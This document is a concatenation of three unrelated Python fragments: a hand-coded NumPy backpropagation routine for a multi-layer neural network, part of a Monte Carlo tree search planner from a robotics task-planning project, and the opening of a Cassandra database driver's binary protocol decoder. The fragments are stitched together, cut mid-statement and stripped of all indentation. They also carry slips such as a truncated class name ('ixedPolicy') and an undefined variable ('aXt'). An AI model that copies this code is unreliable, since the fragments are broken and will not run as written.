grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h1.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h1 = grad_y_pred.dot(wout.T) * derivative_sigmoid(h1)
grad_wh1 = h.T.dot(grad_h1)
grad_bh1 = np.sum(grad_h1, axis=0, keepdims=True)
grad_h = grad_h1.dot(wh1.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh1 += grad_wh1 * learning_rate
bh1 += grad_bh1 * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1)+ bh1)
y_predt = softmax(h1.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# 3 hidden layer
else:
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
wh1 = np.random.uniform(size=(d_h, d_h))
bh1 = np.random.uniform(size=(1, d_h))
wh2 = np.random.uniform(size=(d_h, d_h))
bh2 = np.random.uniform(size=(1, d_h))
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
for i in range(epoch):
# Forward pass
h = sigmoid(X.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1) + bh1)
h2 = sigmoid(h1.dot(wh2)+ bh2)
y_pred = softmax(h2.dot(wout) + bout)
# Compute and print loss
#loss = (y_pred - y).sum()
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
loss = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# Backpropagation to compute gradients
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred)
grad_wout = h2.T.dot(grad_y_pred)
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True)
grad_h2 = grad_y_pred.dot(wout.T) * derivative_sigmoid(h2)
grad_wh2 = h1.T.dot(grad_h2)
grad_bh2 = np.sum(grad_h2, axis=0, keepdims=True)
grad_h1 = grad_h2.dot(wh2.T) * derivative_sigmoid(h1)
grad_wh1 = h.T.dot(grad_h1)
grad_bh1 = np.sum(grad_h1, axis=0, keepdims=True)
grad_h = grad_h1.dot(wh1.T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
# Update weights and biases
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
wh2 += grad_wh2 * learning_rate
bh2 += grad_bh2 * learning_rate
wh1 += grad_wh1 * learning_rate
bh1 += grad_bh1 * learning_rate
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(Xt.dot(wh) + bh)
h1 = sigmoid(h.dot(wh1) + bh1)
h2 = sigmoid(h1.dot(wh2)+ bh2)
y_predt = softmax(h2.dot(wout) + bout)
for n in range(len(Xt)):
if (np.argmax(yt, axis=1)[n] == np.argmax(y_predt, axis=1)[n]):
total_correct += 1
accuracy[nhlayers,d_h-1] = total_correct/len(Xt)*100
# From 4 hidden layer to nhlayer+1
else:
### Neural network hidden layer_1,.., layer_nhlayers+1 ==> from 4 hidden layers
###LAYERS
# Matrix zeros for hidden layers
hweightmatrix = np.zeros((d_h,d_h,nhlayers),float)
hbiasmatrix = np.zeros((1,d_h,nhlayers),float)
# Weight and bias initialization hidden layer_1
wh = np.random.uniform(size=(d_in, d_h))
bh = np.random.uniform(size=(1, d_h))
#Weight and bias initialization hidden layer_2, layer_3, ...., layer_nhleyrs
for i in range(nhlayers):
hweightmatrix[:,:,i] = np.random.uniform(size=(d_h, d_h))
hbiasmatrix[:,:,i] = np.random.uniform(size=(1, d_h))
#Weight and bias initialization output layer
wout = np.random.uniform(size=(d_h, d_out))
bout = np.random.uniform(size=(1, d_out))
# Training hActivationMatriz = Output layer Matriz, hgradmatrix = gradient of the local fiel Matrix,
# hgradweightmatrix = hgradmatrix * input layer, hgradweightmatrix = bias matrix
hActivationMatrix = np.zeros((len(X),d_h,nhlayers),float)
hgradmatrix = np.zeros((len(X),d_h,nhlayers),float)
hgradweightmatrix = np.zeros((d_h,d_h,nhlayers),float)
hgradbiasmatrix = np.zeros((1,d_h,nhlayers),float)
##Train
for i in range(epoch):
## Forward pass
# Hidden layer_1 output
h = sigmoid(X.dot(wh) + bh) # First layer activation or h
# Hidden layer_2 output
hActivationMatrix[:,:,0] = sigmoid(h.dot(hweightmatrix[:,:,0]) + hbiasmatrix[:,:,0])
# Hidden layer_3,..., Layer_nhlayers outputs
for j in range(1,nhlayers):
hActivationMatrix[:,:,j] = sigmoid(hActivationMatrix[:,:,j-1].dot(hweightmatrix[:,:,j]) + hbiasmatrix[:,:,j])
# Last layer output or y_pred
y_pred = softmax(hActivationMatrix[:,:,-1].dot(wout) + bout)
# Compute and print loss
sum_score = 0.0
for t in range(len(y)):
for l in range(len(y[t])):
sum_score += y[t][l]*np.log(1e-15 + y_pred[t][l])
mean_sum_score = 1.0/ len(y)*sum_score
#
#loss1 = (y_pred - y).sum()
#loss2 = np.sum(-y * np.log(y_pred))
if i % 1 == 0:
print('Epoch', i, ':', -mean_sum_score)
# print('Epoch2', i, ':', loss2)
## Backpropagation to compute gradients
# Output layer
grad_y_pred = (y - y_pred) #* derivative_sigmoid(y_pred) # Local gradient
grad_wout = hActivationMatrix[:,:,-1].T.dot(grad_y_pred) # Local gradiente * input to the layer
grad_bout = np.sum(grad_y_pred, axis=0, keepdims=True) # Gradient bias
# Local gradient Hidden layer_nhlayer
hgradmatrix[:,:,0] = grad_y_pred.dot(wout.T) * derivative_sigmoid(hActivationMatrix[:,:,-1])
hgradweightmatrix[:,:,0] = hActivationMatrix[:,:,-2].T.dot(hgradmatrix[:,:,0])
hgradbiasmatrix[:,:,0] = np.sum(hgradmatrix[:,:,0], axis=0, keepdims=True)
# Local gradient hidden layer_nhlayer-1,..., layer_3
for j in range(1,nhlayers-1):
hgradmatrix[:,:,j] = hgradmatrix[:,:,j-1].dot(hweightmatrix[:,:,-j].T) * derivative_sigmoid(hActivationMatrix[:,:,-j-1])
hgradweightmatrix[:,:,j] = hActivationMatrix[:,:,-j-2].T.dot(hgradmatrix[:,:,j])
hgradbiasmatrix[:,:,j] = np.sum(hgradmatrix[:,:,j], axis=0, keepdims=True)
# Local gradient hidden layer_2
hgradmatrix[:,:,-1] = hgradmatrix[:,:,-2].dot(hweightmatrix[:,:,-2].T) * derivative_sigmoid(hActivationMatrix[:,:,0])
hgradweightmatrix[:,:,-1] = h.T.dot(hgradmatrix[:,:,-1])
hgradbiasmatrix[:,:,-1] = np.sum(hgradmatrix[:,:,-1], axis=0, keepdims=True)
# Local gradient hidden layer_1
grad_h = hgradmatrix[:,:,-1].dot(hweightmatrix[:,:,0].T) * derivative_sigmoid(h)
grad_wh = X.T.dot(grad_h)
grad_bh = np.sum(grad_h, axis=0, keepdims=True)
## Update weights and biases
# Output layer
wout += grad_wout * learning_rate
bout += grad_bout * learning_rate
# Hidden layer_2, ... , layer_nhlayer
for j in range(nhlayers):
hweightmatrix[:,:,-j-1] += hgradweightmatrix[:,:,j] * learning_rate
hbiasmatrix[:,:,-j-1] += hgradbiasmatrix[:,:,j] * learning_rate
# Hidden layer_1
wh += grad_wh * learning_rate
bh += grad_bh * learning_rate
#test
h = sigmoid(aXt.dot(wh) + bh) # First layer activation | |
<gh_stars>1-10
from copy import copy, deepcopy
from datetime import datetime
import itertools
import numpy as np
import pprint
import random
import time
from pma.pr_graph import *
from opentamp.policy_hooks.sample import Sample
from opentamp.policy_hooks.utils.policy_solver_utils import *
MAX_OPT_DEPTH = 30 # TODO: Make this more versatile
MCTS_WEIGHT = 10
class ixedPolicy:
def __init__(self, pol, dU, action_inds, state_inds, opt_traj, opt_strength):
self.pol = pol
self.dU = dU
self.action_inds = action_inds
self.state_inds = state_inds
self.opt_traj = opt_traj
self.opt_strength = opt_strength
def act(self, X, O, t, noise):
if self.opt_strength < 1e-2: return self.pol.act(X, O, t, noise)
# opt_u = np.zeros(self.dU)
# for param, attr in self.action_inds:
# opt_u[self.action_inds[param, attr]] = self.opt_traj[t, self.action_inds[param, attr]]
if noise is not None:
if len(self.pol.chol_pol_covar.shape) > 2:
opt_u = self.opt_traj[t] + self.pol.chol_pol_covar[t].T.dot(noise)
else:
opt_u = self.opt_traj[t] + self.pol.chol_pol_covar.T.dot(noise)
else:
opt_u = self.opt_traj[t]
assert not np.any(np.isnan(opt_u))
if np.any(np.isnan(opt_u)):
print(('ERROR NAN IN ACTION FOR OPT', t, self.opt_strength, self.opt_traj[t]))
opt_u[np.where(np.isnan(opt_u))] = 0.
if self.opt_strength > 1 - 1e-2: return opt_u.copy()
return self.opt_strength * opt_u + (1 - self.opt_strength) * self.pol.act(X, O, t, noise)
class MCTSNode():
def __init__(self, label, value, parent, num_tasks, prim_dims, tree=None):
self.label = label
self.value = value
self.num_tasks = num_tasks
self.prim_dims = prim_dims
self.prim_order = list(prim_dims.keys())
self.num_prims = list(prim_dims.values())
self.is_leaf = True
self.children = {}
label_options = itertools.product(list(range(num_tasks)), *[list(range(n)) for n in self.num_prims])
for option in label_options:
self.children[option] = None
self.parent = parent
self.n_explored = 1.0
self.n_child_explored = {label:0 for label in self.children}
self.sample_links = {}
self.sample_to_traj = {}
self.depth = parent.depth + 1 if parent != None else 0
self.tree = tree
if parent is not None:
parent.add_child(self)
self.tree = parent.tree
self.valid = True
self.failures = {}
def erase(self):
self.valid = False
self.tree = None
self.sampke_links = {}
self.sample_to_traj = {}
for child in list(self.children.values()):
if child is not None:
child.erase()
self.children = {}
self.failures = []
def is_root(self):
return self.parent is None or self.parent is self
def is_leaf(self):
return self.is_leaf
def get_task(self):
return self.label[0]
def get_prim(self, prim_name):
return self.label[self.prim_order.index(prim_name)+1]
def update_value(self, new_value):
# self.value = (self.value*self.n_explored + new_value) / (self.n_explored + 1)
# if new_value == 0:
# new_value = 1
# else:
# new_value = 0
self.value = (self.value*self.n_explored + new_value) / (self.n_explored + 1)
self.n_explored += 1
if self.tree is not None: self.tree.n_explored[self.label] += 1
def update_n_explored(self):
self.n_explored += 1
def update_child_explored(self, child_label):
child_label = tuple(child_label)
self.n_child_explored[child_label] += 1
def get_child(self, label):
return self.children[tuple(label)]
def add_child(self, child):
self.children[child.label] = child
child.parent = self
self.is_leaf = False
def get_explored_children(self):
return [n for n in list(self.children.values()) if n is not None]
def has_unexplored(self):
for child in list(self.children.values()):
if child is None: return True
return False
def __repr__(self):
return str(self.label)
class MCTS:
def __init__(self, tasks, prim_dims, gmms, value_f, prob_f, condition, agent, branch_factor, num_samples, num_distilled_samples, choose_next=None, sim_from_next=None, soft_decision=False, C=2e-1, max_depth=20, explore_depth=5, opt_strength=0.0, log_prefix=None, tree_id=0, curric_thresh=-1, n_thresh=-1, her=False, onehot_task=False, soft=False, ff_thresh=0, eta=1.):
self.tasks = tasks
self.num_tasks = len(self.tasks)
self.prim_dims = prim_dims
self.prim_order = list(prim_dims.keys())
self.num_prims = list(prim_dims.values())
self.max_depth = max_depth
self._max_depth = max_depth
self.explore_depth = explore_depth
self.agent = agent
self.soft_decision = soft_decision
self._soft = soft
self.eta = eta
self.ff_thresh = ff_thresh
self.C = C # Standard is to use 2 but given difficulty of finding good paths, using smaller
self.branch_factor = branch_factor
self.num_samples = 1
self.num_distilled_samples = num_distilled_samples
self._choose_next = self._default_choose_next if choose_next is None else choose_next
self._simulate_from_next = self._default_simulate_from_next if sim_from_next is None else sim_from_next
self._value_f = value_f
self._prob_f = prob_f
self._switch_f = None
self._permute = 0
# self.node_check_f = lambda n: n.value/n.n_explored+self.C*np.sqrt(np.log(n.parent.n_explored)/n.n_explored) if n != None else -np.inf
self.start_t = time.time()
self.opt_strength = opt_strength
self.her = her
self.onehot_task = onehot_task
self.curric_thresh = curric_thresh
self.n_thresh = n_thresh
self.cur_curric = 1 if curric_thresh > 0 else 0
if self.cur_curric != 0:
self.max_depth = curric_thresh
self.val_per_run = []
self.first_suc_buf = []
self.use_q = False
self.discrete_prim = True
self.n_resets = 0
self.n_runs = 0
self.reset(gmms, condition)
self.first_success = self.max_depth * 50
self.hl_suc = 0
self.hl_fail = 0
label_options = list(itertools.product(list(range(self.num_tasks)), *[list(range(n)) for n in self.num_prims]))
self.n_explored = {tuple(l): 0 for l in label_options}
self.label_options = label_options
self.log_file = log_prefix + '_paths.txt' if log_prefix is not None else None
self.verbose_log_file = log_prefix + '_verbose.txt' if log_prefix is not None else None
self.log_prefix = log_prefix
self._n_plans = None
if self.log_file is not None:
init_state = []
x = self.agent.x0[self.condition][self.agent._x_data_idx[STATE_ENUM]]
for param_name, attr in self.agent.state_inds:
inds = self.agent.state_inds[param_name, attr]
if inds[-1] < len(x):
init_state.append((param_name, attr, x[inds]))
with open(self.log_file, 'w+') as f:
f.write('Data for MCTS on initial state:')
f.write(str(init_state))
f.write('\n\n')
def add_log_file(self, log_prefix):
self.log_file = log_prefix + '_paths.txt' if log_prefix is not None else None
self.verbose_log_file = log_prefix + '_verbose.txt' if log_prefix is not None else None
self.log_prefix = log_prefix
if self.log_file is not None:
init_state = []
x = self.agent.x0[self.condition][self.agent._x_data_idx[STATE_ENUM]]
for param_name, attr in self.agent.state_inds:
inds = self.agent.state_inds[param_name, attr]
if inds[-1] < len(x):
init_state.append((param_name, attr, x[inds]))
with open(self.log_file, 'w+') as f:
f.write('\n')
with open(self.verbose_log_file, 'w+') as f:
f.write('\n')
def mark_failure(self, node, task):
if node is self.root:
self.root.failures[tuple(task)] = True
if len(list(self.root.failures.keys())) == len(list(self.root.children.keys())):
print(('BAD ROOT STATE; RESETING ON {0}'.format(self.agent.x0[self.condition])))
self.reset()
def reset(self, gmms=None, condition=None):
if hasattr(self, 'root'):
self.root.erase()
self.root = MCTSNode((-1, -1, -1), 0, None, len(self.tasks), self.prim_dims, self)
self.root.parent = self.root
self.gmms = gmms
self.condition = condition if condition is not None else self.condition
self.n_success = 0
self.n_fixed_rollouts = 0
self.n_samples = 1
self.bad_tree = False
self.post_cond = []
self.prim_pre_cond = []
self.x0 = None
self.node_history = {}
self.n_resets += 1
if 1.0 in self.val_per_run:
self.first_success = self.val_per_run.index(1.0)
self.first_suc_buf.append(self.first_success)
if self.agent.check_curric(self.first_suc_buf, self.n_thresh, self.curric_thresh, self.cur_curric):
self.first_suc_buf = []
self.cur_curric += 1
self.max_depth = min(self._max_depth, int(2 * self.max_depth))
print(('{0} updated curriculum to {1}'.format(self.log_file, self.cur_curric)))
# self.max_depth = min(self._max_depth, self.max_depth + 3)
else:
self.first_success = self.n_runs
self.first_suc_buf.append(max(10, self.first_success))
self.n_runs = 0
self.val_per_run = []
self.agent.replace_cond(self.condition, curric_step=self.cur_curric)
self.agent.reset(self.condition)
def get_new_problem(self):
self.reset()
self.agent.replace_conditions([self.condition])
def prob_func(self, prim_obs, soft=False):
prim_obs = prim_obs.reshape((1, -1))
distrs = self._prob_f(prim_obs)
if not soft: return distrs
out = []
for d in distrs:
new_d = np.zeros_like(d)
eta = 1e-1
exp = np.exp((d-np.max(d))/eta)
p = exp / np.sum(exp)
ind = np.random.choice(list(range(len(d))), p=p)
new_d[ind] = 1.
out.append(new_d)
return new_d
def value_func(self, obs):
obs = obs.reshape((1, -1))
return self._value_f(obs)
def update_vals(self, path, success):
node = self.root
for step in path:
node = node.get_child(*step)
if node is None:
node = MCTSNode(step,
int(success),
node,
len(self.tasks),
self.prim_dims)
else:
node.update_value(int(success))
def node_check_f(self, label, state, parent):
child = parent.get_child(label)
sample = Sample(self.agent)
sample.set_X(state.copy(), 0)
# sample.set(TARGETS_ENUM, self.agent.target_vecs[self.condition].copy(), 0)
sample.set(TRAJ_HIST_ENUM, np.array(self.agent.traj_hist).flatten(), 0)
self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=True)
# q_value = 0 if child is None else child.value
# prim_obs = sample.get_prim_obs(t=0)
val_obs = sample.get_val_obs(t=0)
q_value = self.value_func(val_obs)[0] if child is None else child.value
# policy_distrs = self.prob_func(prim_obs)
# prob = np.product([policy_distrs[ind][label[ind]] for ind in range(len(label))])
# child_explored = child.n_explored if child is not None else 0
# return self.value_func(val_obs)[1] + self.C * np.sqrt(parent.n_explored) / (1 + child_explored)
# return q_value + self.C * self.value_func(obs)[1] / (1 + child_explored)
return q_value + self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label]))
# child_value = child.value if child is not None else q_value
# return child_value + self.C * q_value / (1 + parent.n_child_explored[label])
def multi_node_check_f(self, labels, state, parent):
sample = Sample(self.agent)
sample.set_X(state.copy(), 0)
sample.set(TARGETS_ENUM, self.agent.target_vecs[self.condition].copy(), 0)
# sample.set(TRAJ_HIST_ENUM, np.array(self.agent.traj_hist).flatten(), 0)
# self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, labels[0], fill_obs=True)
vals = []
for label in labels:
# self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=False)
child = parent.get_child(label)
# val_obs = sample.get_val_obs(t=0)
if False: # self.use_q:
self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=False)
val_obs = sample.get_val_obs(t=0)
q_value = self.value_func(val_obs)[0] if child is None else child.value
else:
q_value = 0 if child is None else child.value
vals.append(q_value + self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label])))
# vals.append(q_value + \
# self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label])) + \
# self.C * np.sqrt(np.log(self.n_samples) / (1 + self.n_explored[label])))
return vals
def print_run(self, state, use_distilled=True):
value, path = self.simulate(state.copy(), use_distilled, debug=False)
print('Testing rollout of MCTS')
for sample in path:
task = self.tasks[np.argmax(sample.get(TASK_ENUM, t=0))]
targ = self.agent.targ_list[np.argmax(sample.get(TARG_ENUM, t=0))]
print((task, targ))
print((sample.get_X()))
print('End of MCTS rollout.\n\n')
def run(self, state, num_rollouts=20, use_distilled=True, hl_plan=None, new_policies=None, | |
<filename>cassandra/decoder.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from binascii import hexlify
from collections import namedtuple
try:
from collections import OrderedDict
except ImportError: # Python <2.7
from cassandra.util import OrderedDict # NOQA
import datetime
import logging
import socket
import types
from uuid import UUID
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # ignore flake8 warning: # NOQA
from cassandra import (ConsistencyLevel, Unavailable, WriteTimeout, ReadTimeout,
AlreadyExists, InvalidRequest, Unauthorized)
from cassandra.marshal import (int32_pack, int32_unpack, uint16_pack, uint16_unpack,
int8_pack, int8_unpack)
from cassandra.cqltypes import (AsciiType, BytesType, BooleanType,
CounterColumnType, DateType, DecimalType,
DoubleType, FloatType, Int32Type,
InetAddressType, IntegerType, ListType,
LongType, MapType, SetType, TimeUUIDType,
UTF8Type, UUIDType)
log = logging.getLogger(__name__)
class NotSupportedError(Exception):
pass
class InternalError(Exception):
pass
PROTOCOL_VERSION = 0x01
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
def tuple_factory(colnames, rows):
return rows
def named_tuple_factory(colnames, rows):
Row = namedtuple('Row', colnames)
return [Row(*row) for row in rows]
def dict_factory(colnames, rows):
return [dict(zip(colnames, row)) for row in rows]
def ordered_dict_factory(colnames, rows):
return [OrderedDict(zip(colnames, row)) for row in rows]
_message_types_by_name = {}
_message_types_by_opcode = {}
class _register_msg_type(type):
def __init__(cls, name, bases, dct):
if not name.startswith('_'):
_message_types_by_name[cls.name] = cls
_message_types_by_opcode[cls.opcode] = cls
class _MessageType(object):
__metaclass__ = _register_msg_type
params = ()
tracing = False
def __init__(self, **kwargs):
for pname in self.params:
try:
pval = kwargs[pname]
except KeyError:
raise ValueError("%s instances need the %s keyword parameter"
% (self.__class__.__name__, pname))
setattr(self, pname, pval)
def to_string(self, stream_id, compression=None):
body = StringIO()
self.send_body(body)
body = body.getvalue()
version = PROTOCOL_VERSION | HEADER_DIRECTION_FROM_CLIENT
flags = 0
if compression is not None and len(body) > 0:
body = compression(body)
flags |= 0x01
if self.tracing:
flags |= 0x02
msglen = int32_pack(len(body))
msg_parts = map(int8_pack, (version, flags, stream_id, self.opcode)) + [msglen, body]
return ''.join(msg_parts)
def send(self, f, streamid, compression=None):
body = StringIO()
self.send_body(body)
body = body.getvalue()
version = PROTOCOL_VERSION | HEADER_DIRECTION_FROM_CLIENT
flags = 0
if compression is not None and len(body) > 0:
body = compression(body)
flags |= 0x01
if self.tracing:
flags |= 0x02
msglen = int32_pack(len(body))
header = ''.join(map(int8_pack, (version, flags, streamid, self.opcode))) \
+ msglen
f.write(header)
if len(body) > 0:
f.write(body)
def __str__(self):
paramstrs = ['%s=%r' % (pname, getattr(self, pname)) for pname in self.params]
return '<%s(%s)>' % (self.__class__.__name__, ', '.join(paramstrs))
__repr__ = __str__
def decode_response(stream_id, flags, opcode, body, decompressor=None):
if flags & 0x01:
if decompressor is None:
raise Exception("No decompressor available for compressed frame!")
body = decompressor(body)
flags ^= 0x01
body = StringIO(body)
if flags & 0x02:
trace_id = UUID(bytes=body.read(16))
flags ^= 0x02
else:
trace_id = None
if flags:
log.warn("Unknown protocol flags set: %02x. May cause problems." % flags)
msg_class = _message_types_by_opcode[opcode]
msg = msg_class.recv_body(body)
msg.stream_id = stream_id
msg.trace_id = trace_id
return msg
error_classes = {}
class ErrorMessage(_MessageType, Exception):
opcode = 0x00
name = 'ERROR'
params = ('code', 'message', 'info')
summary = 'Unknown'
@classmethod
def recv_body(cls, f):
code = read_int(f)
msg = read_string(f)
subcls = error_classes.get(code, cls)
extra_info = subcls.recv_error_info(f)
return subcls(code=code, message=msg, info=extra_info)
def summary_msg(self):
msg = 'code=%04x [%s] message="%s"' \
% (self.code, self.summary, self.message)
if self.info is not None:
msg += (' info=' + repr(self.info))
return msg
def __str__(self):
return '<ErrorMessage %s>' % self.summary_msg()
__repr__ = __str__
@staticmethod
def recv_error_info(f):
pass
def to_exception(self):
return self
class ErrorMessageSubclass(_register_msg_type):
def __init__(cls, name, bases, dct):
if cls.error_code is not None:
error_classes[cls.error_code] = cls
class ErrorMessageSub(ErrorMessage):
__metaclass__ = ErrorMessageSubclass
error_code = None
class RequestExecutionException(ErrorMessageSub):
pass
class RequestValidationException(ErrorMessageSub):
pass
class ServerError(ErrorMessageSub):
summary = 'Server error'
error_code = 0x0000
class ProtocolException(ErrorMessageSub):
summary = 'Protocol error'
error_code = 0x000A
class UnavailableErrorMessage(RequestExecutionException):
summary = 'Unavailable exception'
error_code = 0x1000
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'required_replicas': read_int(f),
'alive_replicas': read_int(f),
}
def to_exception(self):
return Unavailable(self.summary_msg(), **self.info)
class OverloadedErrorMessage(RequestExecutionException):
summary = 'Coordinator node overloaded'
error_code = 0x1001
class IsBootstrappingErrorMessage(RequestExecutionException):
summary = 'Coordinator node is bootstrapping'
error_code = 0x1002
class TruncateError(RequestExecutionException):
summary = 'Error during truncate'
error_code = 0x1003
class WriteTimeoutErrorMessage(RequestExecutionException):
summary = 'Timeout during write request'
error_code = 0x1100
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'received_responses': read_int(f),
'required_responses': read_int(f),
'write_type': read_string(f),
}
def to_exception(self):
return WriteTimeout(self.summary_msg(), **self.info)
class ReadTimeoutErrorMessage(RequestExecutionException):
summary = 'Timeout during read request'
error_code = 0x1200
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'received_responses': read_int(f),
'required_responses': read_int(f),
'data_retrieved': bool(read_byte(f)),
}
def to_exception(self):
return ReadTimeout(self.summary_msg(), **self.info)
class SyntaxException(RequestValidationException):
summary = 'Syntax error in CQL query'
error_code = 0x2000
class UnauthorizedErrorMessage(RequestValidationException):
summary = 'Unauthorized'
error_code = 0x2100
def to_exception(self):
return Unauthorized(self.summary_msg())
class InvalidRequestException(RequestValidationException):
summary = 'Invalid query'
error_code = 0x2200
def to_exception(self):
return InvalidRequest(self.summary_msg())
class ConfigurationException(RequestValidationException):
summary = 'Query invalid because of configuration issue'
error_code = 0x2300
class PreparedQueryNotFound(RequestValidationException):
summary = 'Matching prepared statement not found on this node'
error_code = 0x2500
@staticmethod
def recv_error_info(f):
# return the query ID
return read_binary_string(f)
class AlreadyExistsException(ConfigurationException):
summary = 'Item already exists'
error_code = 0x2400
@staticmethod
def recv_error_info(f):
return {
'keyspace': read_string(f),
'table': read_string(f),
}
def to_exception(self):
return AlreadyExists(**self.info)
class StartupMessage(_MessageType):
opcode = 0x01
name = 'STARTUP'
params = ('cqlversion', 'options')
KNOWN_OPTION_KEYS = set((
'CQL_VERSION',
'COMPRESSION',
))
def send_body(self, f):
optmap = self.options.copy()
optmap['CQL_VERSION'] = self.cqlversion
write_stringmap(f, optmap)
class ReadyMessage(_MessageType):
opcode = 0x02
name = 'READY'
params = ()
@classmethod
def recv_body(cls, f):
return cls()
class AuthenticateMessage(_MessageType):
opcode = 0x03
name = 'AUTHENTICATE'
params = ('authenticator',)
@classmethod
def recv_body(cls, f):
authname = read_string(f)
return cls(authenticator=authname)
class CredentialsMessage(_MessageType):
opcode = 0x04
name = 'CREDENTIALS'
params = ('creds',)
def send_body(self, f):
write_short(f, len(self.creds))
for credkey, credval in self.creds.items():
write_string(f, credkey)
write_string(f, credval)
class OptionsMessage(_MessageType):
opcode = 0x05
name = 'OPTIONS'
params = ()
def send_body(self, f):
pass
class SupportedMessage(_MessageType):
opcode = 0x06
name = 'SUPPORTED'
params = ('cql_versions', 'options',)
@classmethod
def recv_body(cls, f):
options = read_stringmultimap(f)
cql_versions = options.pop('CQL_VERSION')
return cls(cql_versions=cql_versions, options=options)
class QueryMessage(_MessageType):
opcode = 0x07
name = 'QUERY'
params = ('query', 'consistency_level',)
def send_body(self, f):
write_longstring(f, self.query)
write_consistency_level(f, self.consistency_level)
class ResultMessage(_MessageType):
opcode = 0x08
name = 'RESULT'
params = ('kind', 'results',)
KIND_VOID = 0x0001
KIND_ROWS = 0x0002
KIND_SET_KEYSPACE = 0x0003
KIND_PREPARED = 0x0004
KIND_SCHEMA_CHANGE = 0x0005
type_codes = {
0x0001: AsciiType,
0x0002: LongType,
0x0003: BytesType,
0x0004: BooleanType,
0x0005: CounterColumnType,
0x0006: DecimalType,
0x0007: DoubleType,
0x0008: FloatType,
0x0009: Int32Type,
0x000A: UTF8Type,
0x000B: DateType,
0x000C: UUIDType,
0x000D: UTF8Type,
0x000E: IntegerType,
0x000F: TimeUUIDType,
0x0010: InetAddressType,
0x0020: ListType,
0x0021: MapType,
0x0022: SetType,
}
FLAGS_GLOBAL_TABLES_SPEC = 0x0001
@classmethod
def recv_body(cls, f):
kind = read_int(f)
if kind == cls.KIND_VOID:
results = None
elif kind == cls.KIND_ROWS:
results = cls.recv_results_rows(f)
elif kind == cls.KIND_SET_KEYSPACE:
ksname = read_string(f)
results = ksname
elif kind == cls.KIND_PREPARED:
results = cls.recv_results_prepared(f)
elif kind == cls.KIND_SCHEMA_CHANGE:
results = cls.recv_results_schema_change(f)
return cls(kind=kind, results=results)
@classmethod
def recv_results_rows(cls, f):
column_metadata = cls.recv_results_metadata(f)
rowcount = read_int(f)
rows = [cls.recv_row(f, len(column_metadata)) for x in xrange(rowcount)]
colnames = [c[2] for c in column_metadata]
coltypes = [c[3] for c in column_metadata]
return (colnames, [tuple(ctype.from_binary(val) for ctype, val in zip(coltypes, row))
for row in rows])
@classmethod
def recv_results_prepared(cls, f):
query_id = read_binary_string(f)
column_metadata = cls.recv_results_metadata(f)
return (query_id, column_metadata)
@classmethod
def recv_results_metadata(cls, f):
flags = read_int(f)
glob_tblspec = bool(flags & cls.FLAGS_GLOBAL_TABLES_SPEC)
colcount = read_int(f)
if glob_tblspec:
ksname = read_string(f)
cfname = read_string(f)
column_metadata = []
for x in xrange(colcount):
if glob_tblspec:
colksname = ksname
colcfname = cfname
else:
colksname = read_string(f)
colcfname = read_string(f)
colname = read_string(f)
coltype = cls.read_type(f)
column_metadata.append((colksname, colcfname, colname, coltype))
return column_metadata
@classmethod
def recv_results_schema_change(cls, f):
change_type = read_string(f)
keyspace = read_string(f)
table = read_string(f)
return dict(change_type=change_type, keyspace=keyspace, table=table)
@classmethod
def read_type(cls, f):
optid = read_short(f)
try:
typeclass = cls.type_codes[optid]
except KeyError:
raise NotSupportedError("Unknown data type code 0x%x. Have to skip"
" entire result set." % optid)
if typeclass in (ListType, SetType):
subtype = cls.read_type(f)
typeclass = typeclass.apply_parameters(subtype)
elif typeclass == MapType:
keysubtype = cls.read_type(f)
valsubtype = cls.read_type(f)
